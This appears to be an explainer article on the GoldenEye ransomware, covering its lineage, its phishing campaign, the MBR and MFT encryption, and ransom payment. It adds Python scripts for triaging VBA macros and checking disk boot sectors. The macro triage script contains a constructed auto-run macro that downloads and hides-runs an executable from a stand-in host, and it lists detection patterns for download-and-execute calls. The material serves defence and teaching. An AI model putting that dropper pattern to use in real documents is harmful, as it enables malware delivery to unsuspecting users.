What is the GoldenEye Ransomware Attack?


If you are a Bond fan you have undoubtedly seen the film GoldenEye. The GoldenEye ransomware takes its name from that film, and so does the name of the hacker group behind it.

In the film, the Janus Syndicate, a Russian organized crime group, exploits the instability that followed the fall of the Soviet Union by breaking into the control systems of two Soviet satellites, named Petya and Mischa, and then fires GoldenEye, an electromagnetic pulse weapon.

The Petya ransomware was created by a Russian hacker gang that adopted the name Janus from the film's crime syndicate and named its malware after one of the satellites. When the gang wanted a name for its second malware, Mischa, the other satellite, was available. With only two satellites in the film, the group turned to the title itself when a third name was needed. The group's strong affinity for this fictional criminal organization suggests that its members are Russian.

What Makes GoldenEye Special?

The GoldenEye ransomware combines two attack methods. First, a pair of malware programs, Petya and Mischa, is downloaded. Second, these programs encrypt data and demand payment for the decryption key, as any ransomware does.

Petya was revolutionary at the time because it locks the entire disk rather than encrypting individual files: it encrypts the Master File Table (MFT), so no file on the volume can be located, even though the file contents themselves are untouched. Attacks using Petya and GoldenEye were not launched by their authors. Instead, the malware was offered as Ransomware-as-a-Service (RaaS) to other criminals, so a wide variety of individuals were behind the various targeted attacks.

Petya was initially released as a beta to a small number of affiliates. Because the ransom note and logo were displayed on a red background, this version became known as Red Petya. It had a serious limitation: it needed Administrator rights to reach the disk at the low level its encryption required, so it failed on accounts that lacked them.

When the system was released more widely, the authors improved the design and changed the colour scheme, giving Green Petya. This version bundled Mischa, which encrypts files one by one like a conventional ransomware. Petya first attempted its low-level attack; if it could not obtain Administrator rights, it launched Mischa instead.

An interim release, version 2.5, fixed flaws in the ransomware but kept the Green Petya branding. The fourth edition, Petya 3.0, was the final system: GoldenEye. GoldenEye launches both Mischa and Petya, with Mischa running first, so a victim's data ends up under two layers of encryption. GoldenEye's livery is yellow and black rather than green.

Origin of the GoldenEye Ransomware

Janus Cybercrime Solutions is the name the developers of GoldenEye gave themselves. This is not a large, state-backed hacking organization, but hints in the group's branding, naming patterns and artwork point to a Russian base.

The group ran a Twitter account under the handle Janus Secretary. It was active in 2016 and 2017 but has had no recent posts.

How Does the GoldenEye Malware Operate?

GoldenEye had a brief life. Its first attacks began on 5 December 2016, and the campaign did not last a full year. Earlier Petya versions addressed their targets in English, but GoldenEye did so in fluent German. It was a customized build of a system sold as Ransomware-as-a-Service, and it is odd that the Janus group would choose to attack only Germany. It is likely that GoldenEye was built specifically for one of the Petya RaaS platform's important clients.

Reconnaissance was the first step of the GoldenEye intrusion. Every target was a company that had posted job openings, so GoldenEye was not used for mass mailings; each email was sent in reply to an advertisement, posing as an application. The sender was always "Rolf Drescher", the name of a German cybersecurity firm, "Dipl.-Ing. Rolf B. Drescher VDI & Partner", which offered Petya mitigation services; the impersonation was intended as an attack on that firm as well. Targets received an email with a PDF résumé and an XLS file attached. The XLS file carried the GoldenEye installer as VBA macros, which run as soon as the file is opened with macros enabled.

The macros connected to a remote server, downloaded the Mischa-specific code and ran it. The installer then fetched and executed the low-level Petya code. GoldenEye's Petya component had been reworked to get past the earlier operating-system restriction, so that the low-level stage no longer failed outright when the user account lacked Administrator rights.
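The macro stage is the natural place to catch this chain. As an added example (not code from the page, and not GoldenEye's own macro), the script below triages extracted VBA source for the combination that matters here: an auto-run entry point together with download-and-execute capability. The sample macro, the indicator list and the weights are constructed for this illustration; extracting the VBA from the XLS container (for instance with olevba from oletools) is assumed to have happened already.

```python
"""Heuristic triage of VBA macro source for the auto-run, download-and-execute
pattern. The input is macro source text; extracting it from the OLE/XLS
container is a separate step (e.g. with oletools' olevba) not done here."""
import re

# Procedures that Office runs automatically when a document is opened.
AUTO_EXEC = ("Workbook_Open", "Auto_Open", "Document_Open", "AutoOpen", "AutoExec")

# Capability indicators: (regex, label, weight). Weights are assumed for this example.
INDICATORS = [
    (r"URLDownloadToFile|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream",
     "downloader", 3),
    (r"\bShell\b|WScript\.Shell|\.Run\b|\.Exec\b|CreateProcess", "executes_process", 3),
    (r'Environ\s*\(\s*"(TEMP|APPDATA)"', "writes_to_user_profile", 1),
    (r"https?://", "embedded_url", 1),
    (r"(Chr\s*\([^)]*\)\s*&\s*){3,}", "string_obfuscation", 2),
    (r"powershell|cmd(\.exe)?\s*/c|rundll32", "lolbin", 2),
]

# Constructed sample modelled on the chain described above (an auto-run macro
# that fetches a second stage and launches it). Illustrative only.
SAMPLE_MACRO = r'''
Private Sub Workbook_Open()
    Dim u As String, p As String
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & "://files.example.invalid/stage1.exe"
    p = Environ("TEMP") & "\update.exe"
    URLDownloadToFile 0, u, p, 0, 0
    Shell p, vbHide
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_MACRO = r'''
Sub FormatReport()
    Range("A1:D1").Font.Bold = True
    Columns("A:D").AutoFit
End Sub
'''


def score_macro(src):
    """Return the auto-exec entry points, matched indicator labels and a total score."""
    auto = [name for name in AUTO_EXEC if re.search(r"\bSub\s+" + name + r"\b", src)]
    hits = {}
    for pattern, label, weight in INDICATORS:
        if re.search(pattern, src, re.IGNORECASE):
            hits[label] = weight
    score = sum(hits.values()) + (3 if auto else 0)
    return {"auto_exec": auto, "indicators": sorted(hits), "score": score}


def is_suspicious(src, threshold=6):
    """Flag macros that both run automatically and can fetch or launch code."""
    result = score_macro(src)
    capable = {"downloader", "executes_process"} & set(result["indicators"])
    return bool(result["auto_exec"] and capable and result["score"] >= threshold)


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, score_macro(src), "SUSPICIOUS" if is_suspicious(src) else "ok")
```

Note that the sample builds "http" from Chr() calls, so a plain search for a URL misses it; the obfuscation indicator is what covers that gap. A scorer like this is a triage aid, not a verdict: the weights are arbitrary and a macro can pass the auto-run and download tests in any number of other ways.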

GoldenEye then crashed the computer and forced a restart. On reboot the user was shown a fake CHKDSK screen, written in English, with a progress bar that appeared to track the disk check. In fact it was a front for the encryption taking place underneath.

With that low-level disk access, GoldenEye rewrote the Master Boot Record (MBR) with its own loader, encrypted the Master File Table (MFT) and disabled the Safe Mode boot option. The Petya stage uses the Salsa20 stream cipher for the MFT; the Mischa stage uses AES to encrypt file contents and RSA to protect the AES keys.
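The MBR rewrite is visible from sector 0 of the disk, so an incident responder with a disk image can triage it without booting the machine. The script below is an added example, not from the page: it parses the 512-byte MBR, checks the boot signature and partition table, and compares the bootstrap code against a hash recorded from a known-good host. The sample sectors are constructed, and the "tampered" bootstrap bytes are a stand-in rather than GoldenEye's real loader.

```python
"""Sector-0 triage for a Petya/GoldenEye-style MBR rewrite: parse the 512-byte
MBR, check the boot signature and partition table, and compare the bootstrap
code against a known-good baseline hash taken before the incident."""
import hashlib
import struct

SECTOR = 512
ENTRY = "<B3sB3sII"  # status, CHS start, type, CHS end, start LBA, sector count


def build_mbr(bootcode, partitions=((0x80, 0x07, 2048, 204800),)):
    """Assemble a 512-byte MBR from bootstrap code and (status, type, start_lba, size) entries."""
    if len(bootcode) > 446:
        raise ValueError("bootstrap code must fit in 446 bytes")
    table = b"".join(struct.pack(ENTRY, status, b"\x00" * 3, ptype, b"\x00" * 3, start, size)
                     for status, ptype, start, size in partitions)
    return bootcode.ljust(446, b"\x00") + table.ljust(64, b"\x00") + b"\x55\xaa"


def parse_mbr(sector):
    if len(sector) != SECTOR:
        raise ValueError("expected a 512-byte sector")
    partitions = []
    for i in range(4):
        status, _, ptype, _, start, size = struct.unpack_from(ENTRY, sector, 446 + 16 * i)
        if ptype != 0:  # type 0 marks an unused entry
            partitions.append({"bootable": status == 0x80, "type": ptype,
                               "start_lba": start, "sectors": size})
    return {"bootcode": sector[:446], "partitions": partitions,
            "signature_ok": sector[510:512] == b"\x55\xaa"}


def triage_mbr(sector, baseline_sha256):
    """Return a list of findings; an empty list means sector 0 matches expectations."""
    info = parse_mbr(sector)
    findings = []
    if not info["signature_ok"]:
        findings.append("boot signature 0x55AA missing")
    if hashlib.sha256(info["bootcode"]).hexdigest() != baseline_sha256:
        findings.append("bootstrap code differs from baseline")
    if not any(p["bootable"] for p in info["partitions"]):
        findings.append("no partition marked bootable")
    for p in info["partitions"]:
        if p["start_lba"] < 1:
            findings.append("partition starts at LBA 0 (overlaps the MBR)")
    return findings


def triage_image(path, baseline_sha256):
    """Read sector 0 of a disk image or raw device (e.g. /dev/sda, \\\\.\\PhysicalDrive0) and triage it."""
    with open(path, "rb") as f:
        return triage_mbr(f.read(SECTOR), baseline_sha256)


# Constructed sample sectors. The bootstrap bytes are stand-ins, not real boot code.
CLEAN_MBR = build_mbr(b"\xfa\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * 24)
BASELINE = hashlib.sha256(CLEAN_MBR[:446]).hexdigest()  # recorded on a known-good host
# A loader replacement: bootstrap rewritten, partition table left intact, which is
# how a Petya-style MBR rewrite looks from sector 0.
TAMPERED_MBR = build_mbr(b"\xeb\x20" + b"FAKE CHKDSK LOADER".ljust(40, b"\x00"))

if __name__ == "__main__":
    print("clean:", triage_mbr(CLEAN_MBR, BASELINE) or "no findings")
    print("tampered:", triage_mbr(TAMPERED_MBR, BASELINE))
```

A loader replacement leaves the partition table untouched, so a check on the table alone would pass; the baseline hash of the first 446 bytes is what catches the rewrite. The encrypted MFT lives on the NTFS volume, not in sector 0, so this check finds the loader, not the encrypted data. Reading a raw device rather than an image requires root on Linux or an elevated prompt on Windows.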

Once the MFT encryption finished, the computer displayed the GoldenEye emblem with a text-based skull and crossbones, followed by instructions for paying the ransom.

To recover, the victim was told to download the Tor Browser, visit a specific website and enter a unique ID. The site then gave instructions for paying the ransom in Bitcoin. After payment, the victim received a decryption key for the MFT locker and a decryptor tool to undo the Mischa encryption.

Unlike some ransomware, the decryption procedure actually worked, and victims who paid the ransom were able to recover fully.

Updated on 05-Aug-2022 12:48:59